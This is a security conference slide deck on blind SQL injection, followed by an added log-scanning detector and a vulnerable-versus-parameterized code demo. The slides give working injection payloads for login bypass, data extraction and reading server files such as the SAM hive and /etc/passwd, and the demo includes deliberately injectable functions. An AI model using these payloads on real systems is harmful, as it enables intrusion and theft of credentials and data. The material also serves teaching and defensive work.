Playing With (B)Sqli
(Re) Playing with (Blind) SQL Injection
Chema Alonso Informatica64
Microsoft MVP Enterprise Security
SQL Injection attacks
http://www.phrack.org/issues.html?id=8&issue=54
A long time ago, in a galaxy far, far away…
Back in the 90s
Select id from users_table where login='$users' and passw='$password';
User:
Password: ****************
Back in the 90s
Select id from users_table where login='Admin' and passw='' or '1'='1';
User: Admin
Password: ' or '1'='1
Not everybody….
ODBC Error messages
• Username: ' having 1=1--
• [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
• Username: ' group by users.id having 1=1--
• [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
• And so on…
Even security companies: Kaspersky
Agenda
• Serialized SQL Injection
– Demo: XML Extractor
• Arithmetic SQL Injection
– Divide by zero
– Sums and subtractions
– Type overflow
– Demo
• Remote File Downloading using Blind SQL Injection
– SQL Server
– MySQL
– Oracle
– Demo: RFD Tool
• Time-Based Blind SQL Injection using heavy queries
– Demo: Marathon Tool
Serialized SQL Injection
Serialized SQL Injection
• Goal: to merge complex result sets into a single displayable field.
• XML serialization functions convert a result set into a single XML string.
• A large amount of data can be downloaded with single, simple injections.
SQL Server
• FOR XML: retrieves data as a single string representing an XML tree.
• RAW: mandatory option. Converts each row of the result set into an XML element of the form <row />.
• BINARY BASE64: the query fails on any column of a BINARY data type (containing images or passwords) unless this option is explicitly specified.
– union select '1','2','3',(select * from sysusers for xml raw, binary base64)
• XMLSCHEMA: obtains the whole table structure, including data types, column names and other constraints.
– Described by Dani Kachakil
MySQL
• No default XML support, requires a server side extension
• GROUP_CONCAT (v 4.1+)
Oracle
• xmlforest, xmlelement, …
• No * support
Demo: Serialized SQL Injection
Arithmetic Blind SQL Injection
Blind Attacks
• The attacker injects code but cannot access the data directly.
• However, the injection changes the behaviour of the web application.
• The attacker then looks for differences between true injections (1=1) and false injections (1=2) in the response pages to extract data.
– Blind SQL Injection
– Blind XPath Injection
– Blind LDAP Injection
Blind SQL Injection Attacks
• Attacker injects:
– "True where clauses"
– "False where clauses"
– Ex:
• Program.php?id=1 and 1=1
• Program.php?id=1 and 1=2
• The program doesn't return any visible data from the database, nor data in error messages.
• The attacker can't see any data extracted from the database.
Blind SQL Injection Attacks
• The attacker analyzes the response pages looking for differences between the "True-Answer Page" and the "False-Answer Page":
– Different hashes
– Different HTML structure
– Different patterns (keywords)
– Different linear ASCII sums
– "Different behaviour"
• For example: response time
Blind SQL Injection Attacks
• If any difference exists, then:
– The attacker can extract all information from the database
– How? Using "booleanization"
• MySQL:
– Program.php?id=1 and 100>(ASCII(Substring(user(),1,1)))
» "True-Answer Page" or "False-Answer Page"?
• MSSQL:
– Program.php?id=1 and 100>(Select top 1 ASCII(Substring(name,1,1)) from sysusers)
• Oracle:
– Program.php?id=1 and 100>(Select ASCII(Substr(username,1,1)) from all_users where rownum<=1)
Blind SQL Injection
Arithmetic Blind SQL Injection
• The query forces the parameter to be numeric
– SELECT field FROM table WHERE id=abs(param)
• Ex:
Get Param(ID)
Select ... Where att1=abs(ID)
Select ... Where att2=k1-ID
Print response
• Boolean logic must be built with math operations
Arithmetic Blind SQL Injection
• Divide by zero (David Litchfield)
– Id=A+(1/(ASCII(B)-C))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the DB raises a divide-by-zero exception.
Arithmetic Blind SQL Injection
• Sums and subtractions
– Id=A+ASCII(B)-C
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
– When ASCII(B)=C, the response page for id=A+ASCII(B)-C is the same as for id=A
Arithmetic Blind SQL Injection
• Value type overflow
– Id=A+((C/ASCII(B))*(K))
• A -> Param value originally used in the query.
• B -> Value we are searching for, e.g.: Substring(passwd,1,1)
• C -> Counter [0..255]
• K -> Value that overflows the type defined for A
– (e.g. if A is an integer, then K=2^32)
– When C/ASCII(B)==1, K*1 overflows the data type
Demo:
• Divide by zero
• Sums and subtractions
• Integer overflow
Remote File Downloading using Blind SQL Injection techniques
Accessing Files
• Two ways:
– Load the file in a temp table
• and i>(select top 1 ASCII(Substring(column,pos,1)) from temp_table) ??
– Load the file in the query
• With every query the file is loaded in memory
• I am very sorry, engine
• and i>ASCII(Substring(load_file(file),pos,1)) ??
SQL Server 2K - External Data Sources
• Only for known file types:
– Access through drivers: txt, csv, xls, mdb, log
– And 200>ASCII(SUBSTRING((SELECT * FROM OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt; *.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt')),1,1))
• Privileges
– HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSSQLServer\Providers\DisallowAdhocAccess=0
– By default this key doesn't exist, so only users with the Server Admin role can use these functions.
• NTFS permissions
SQL Server 2K – Bulk option
• Access to any file
– ; Create Table TempTable (row varchar(8000)) --
– ; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n', ROWTERMINATOR = '\n') --
– ; alter table TempTable add num int IDENTITY(1,1) NOT NULL --
– and (select COUNT(row) from TempTable)
– and (select top 1 len(row) from TempTable where num = rownum)
– and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num = 1)
– ; Drop Table TempTable --
• Privileges needed
– Server role: bulkadmin
– Database role: db_owner or db_ddladmin
• NTFS permissions
SQL Server 2k5 – 2k8
• OPENDATASOURCE and OPENROWSET supported
• Bulk options improved
– AND 256 > ASCII(SUBSTRING((SELECT * FROM OPENROWSET(BULK 'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))--
• Permissions
• bulkadmin server role
• External Data Sources enabled
• sp_configure
• Surface Area Configuration tool for features
MySQL
• LoadFile
– SELECT LOAD_FILE('/etc/passwd')
• SQLbfTools: MySQLget command (illo and dab)
• http://www.reversing.org/node/view/11
• Load Data infile
– ; Create table C8DFC643 (datos varchar(4000))
– ; Load data infile 'c:\\boot.ini' into table C8DFC643
– ; alter table C8DFC643 add column num integer auto_increment unique key
– and (select count(num) from C8DFC643)
– and (select length(datos) from C8DFC643 where num = 1)
– and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
– ; Drop table C8DFC643
Oracle – Plain Text files
• External Tables
– ; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; --
– ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization external (TYPE ORACLE_LOADER default directory A4A9308C access parameters ( records delimited by newline ) location (''boot.ini''))'; end; --
– Only plain text files
Oracle – DBMS_LOB
; execute immediate 'DECLARE
  l_bfile BFILE;
  l_blob BLOB;
BEGIN
  INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO l_blob;
  l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
  DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
  DBMS_LOB.loadfromfile(l_blob, l_bfile, DBMS_LOB.getlength(l_bfile));
  DBMS_LOB.fileclose(l_bfile);
  COMMIT;
EXCEPTION
  WHEN OTHERS THEN ROLLBACK;
END;'; end; --
Demo RFD
Time-based Blind SQL Injection using heavy queries
Time-Based Blind SQL Injection
• In scenarios with no differences between "True-Answer Page" and "False-Answer Page", time delays can be used.
• The injection forces a delay in the response page when the injected condition is true.
– Delay functions:
• SQL Server: waitfor
• Oracle: dbms_lock.sleep
• MySQL: sleep or benchmark function
• Postgres: pg_sleep
– Ex:
• ; if (exists(select * from users)) waitfor delay '0:0:5'
Exploit for Solar Empire Web Game
Time-Based Blind SQL Injection
• What about database engines without delay functions, i.e., MS Access, Oracle connections without PL/SQL support, DB2, etc.?
• Can we still exploit Time-Based Blind SQL Injection attacks?
Yes, we can!
“Where-Clause” execution order
Select whatever From whatever Where condition1 and condition2
- Condition1 lasts 10 seconds
- Condition2 lasts 100 seconds
Which condition should be executed first?
The heavy condition first
Condition2 (100 sec) | Condition1 (10 sec) | Condition2 AND Condition1 | Response time
TRUE                 | FALSE               | FALSE                     | 110 sec
TRUE                 | TRUE                | TRUE                      | 110 sec
FALSE                | Not evaluated       | FALSE                     | 100 sec
The light condition first
Condition1 (10 sec) | Condition2 (100 sec) | Condition1 AND Condition2 | Response time
TRUE                | FALSE                | FALSE                     | 110 sec
TRUE                | TRUE                 | TRUE                      | 110 sec
FALSE               | Not evaluated        | FALSE                     | 10 sec
Time-Based Blind SQL Injection using Heavy Queries
• An attacker could inject a heavy cross-join condition to delay the response page on true injections.
• The cross-join condition must be heavier than the other condition.
• The attacker only has to know or guess the name of a table with select permission in the database.
• Example in MSSQL:
– Program.php?id=1 and (SELECT count(*) FROM sysusers AS sys1, sysusers AS sys2, sysusers AS sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 300>(select top 1 ascii(substring(name,1,1)) from sysusers)
“Default” tables to construct a heavy query
– Microsoft SQL Server
• sysusers
– Oracle
• all_users
– MySQL (version 5)
• information_schema.columns
– Microsoft Access
• MSysAccessObjects (97 & 2000 versions)
• MSysAccessStorage (2003 & 2007)
“Default” tables to construct a heavy query
• …or whatever you can guess
– Clients
– Customers
– News
– Logins
– Users
– Providers
– …
Use your imagination…
Ex 1: MS SQL Server
• Query takes 14 seconds -> True-Answer
Ex 1: MS SQL Server
• Query takes 1 second -> False-Answer
Ex 2: Oracle
• Query takes 22 seconds -> True-Answer
Ex 2: Oracle
• Query takes 1 second -> False-Answer
Ex 3: Access 2007
• Query takes 39 seconds -> True-Answer
Ex 3: Access 2007
• Query takes 1 second -> False-Answer
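Added example, not part of the slides and not related to the Marathon Tool: a small log scanner that flags the request patterns this deck describes (ASCII/Substring booleanization, the delay functions listed under Time-Based Blind SQL Injection, the file-access functions from the RFD section, FOR XML serialization, and the repeated self-join that makes a heavy query). The Apache-style log lines, the regexes and the `heavy_selfjoin_count` heuristic are constructed for this example; the threshold of three copies of the same table in one FROM list is an assumption.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed signatures (assumption: these are the only patterns we care about here).
DELAY_FUNCS = re.compile(r"\b(waitfor\s+delay|dbms_lock\.sleep|pg_sleep|benchmark\s*\(|sleep\s*\()", re.I)
FILE_ACCESS = re.compile(r"\b(openrowset|opendatasource|load_file|load\s+data\s+infile|bulk\s+insert)\b", re.I)
XML_SERIAL = re.compile(r"\bfor\s+xml\b", re.I)
BOOLEANIZE = re.compile(r"\bascii\s*\(\s*subst", re.I)
FROM_CLAUSE = re.compile(r"\bfrom\s+([^)]*?)(?=\bwhere\b|\)|$)", re.I | re.S)
REQUEST_PATH = re.compile(r'"(?:GET|POST)\s+(\S+)')

# Heavy-query heuristic: how often the same table name appears in one FROM list.
HEAVY_SELFJOIN_THRESHOLD = 3  # assumption, tune per application


def heavy_selfjoin_count(query):
    """Return the largest number of times one table is repeated in a FROM list."""
    worst = 0
    for m in FROM_CLAUSE.finditer(query):
        tables = Counter()
        for piece in m.group(1).split(","):
            piece = piece.strip()
            if piece:
                tables[piece.split()[0].lower()] += 1  # first token is the table name
        if tables:
            worst = max(worst, max(tables.values()))
    return worst


def analyze_request(line):
    """Decode the request path from one access-log line and return a list of findings."""
    m = REQUEST_PATH.search(line)
    url = unquote_plus(m.group(1)) if m else unquote_plus(line)
    findings = []
    if BOOLEANIZE.search(url):
        findings.append("booleanization")
    if DELAY_FUNCS.search(url):
        findings.append("delay-function")
    if FILE_ACCESS.search(url):
        findings.append("file-access")
    if XML_SERIAL.search(url):
        findings.append("xml-serialization")
    n = heavy_selfjoin_count(url)
    if n >= HEAVY_SELFJOIN_THRESHOLD:
        findings.append("heavy-query:selfjoin x%d" % n)
    return findings


def scan(lines):
    """Findings per line, in input order (empty list = nothing suspicious)."""
    return [analyze_request(line) for line in lines]


# Constructed sample log lines; the hostnames, timestamps and sizes are made up.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2009:10:00:01 +0100] "GET /Program.php?id=1 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2009:10:00:02 +0100] "GET /Program.php?id=1%20and%20100%3E(ASCII(Substring(user(),1,1))) HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2009:10:00:09 +0100] "GET /Program.php?id=1;if(exists(select*from+users))waitfor+delay+\'0:0:5\'-- HTTP/1.1" 200 5120',
    '10.0.0.5 - - [12/Mar/2009:10:00:25 +0100] "GET /Program.php?id=1+and+(SELECT+count(*)+FROM+sysusers+AS+sys1,sysusers+as+sys2,sysusers+as+sys3,sysusers+as+sys4)%3E1+and+300%3E(select+top+1+ascii(substring(name,1,1))+from+sysusers) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for line, findings in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(findings or "clean", "<-", line.split('"')[1])
```

Decoding with `unquote_plus` before matching matters: the heavy-query and delay payloads in the constructed lines arrive with `+` and `%3E`, and a scanner that matches the raw path misses them. The self-join count is a heuristic, not a rule: legitimate reports do join a table to itself, so use it to prioritise review, and correlate with the response-time field if the log format records one.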
Marathon Tool
• Automates Time-Based Blind SQL Injection attacks using heavy queries against SQL Server, MySQL, MS Access and Oracle databases.
• Schema extraction from known databases
• Extracts data using heavy queries regardless of the database engine (without schema)
• Developed in .NET
• Source code available
• http://www.codeplex.com/marathontool
Demo: Marathon Tool
Prevention:
Don´t forget Bobby Tables!
SANITIZE YOUR QUERIES!
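Added example, not part of the slides: the 90s login query from the start of the deck and the `abs(param)` query from the Arithmetic Blind SQL Injection section, each written the vulnerable way beside a hardened version that binds parameters and validates shape. The in-memory SQLite database, table contents and function names are constructed for this example; the password `' or '1'='1` is the one the slides use.

```python
import re
import sqlite3


def make_db():
    """Constructed sample database: the users_table from the login example plus an items table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_table (id INTEGER PRIMARY KEY, login TEXT, passw TEXT)")
    conn.execute("INSERT INTO users_table VALUES (1, 'Admin', 'correct-horse')")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "first"), (2, "second")])
    conn.commit()
    return conn


def login_vulnerable(conn, user, password):
    # The 90s-style query: input is pasted into the SQL text, so the password
    # ' or '1'='1 turns the WHERE clause into (login='Admin' AND passw='') OR '1'='1'.
    sql = "SELECT id FROM users_table WHERE login='%s' AND passw='%s'" % (user, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, user, password):
    # Hardened form: bound parameters travel as data and are never parsed as SQL,
    # so the same password is compared literally and matches nothing.
    row = conn.execute(
        "SELECT id FROM users_table WHERE login=? AND passw=?", (user, password)
    ).fetchone()
    return row[0] if row else None


def item_vulnerable(conn, id_param):
    # abs() forces the *result* to be numeric, but the parameter text is still
    # concatenated, so the database evaluates whatever arithmetic it contains
    # and the response changes with the expression's value.
    sql = "SELECT name FROM items WHERE id=abs(%s)" % id_param
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


INT_LITERAL = re.compile(r"-?\d{1,9}")  # assumption: ids fit in nine digits


def item_hardened(conn, id_param):
    # Validate the shape first (an integer literal and nothing else), then bind
    # the converted value; an expression such as "1+1" is rejected before any SQL runs.
    if not INT_LITERAL.fullmatch(id_param):
        raise ValueError("id must be an integer literal")
    row = conn.execute("SELECT name FROM items WHERE id=abs(?)", (int(id_param),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable login  :", login_vulnerable(db, "Admin", payload))
    print("parameterized     :", login_parameterized(db, "Admin", payload))
    print("abs() concatenated:", item_vulnerable(db, "1+1"))
    try:
        item_hardened(db, "1+1")
    except ValueError as exc:
        print("validated + bound :", exc)
```

The two hardened functions make the same point from both ends of the deck: the SQL text is fixed at development time, and everything that comes from the request is passed as a bound value. Wrapping a concatenated value in `abs()` or another cast does not achieve that, because the expression is evaluated before the cast is applied.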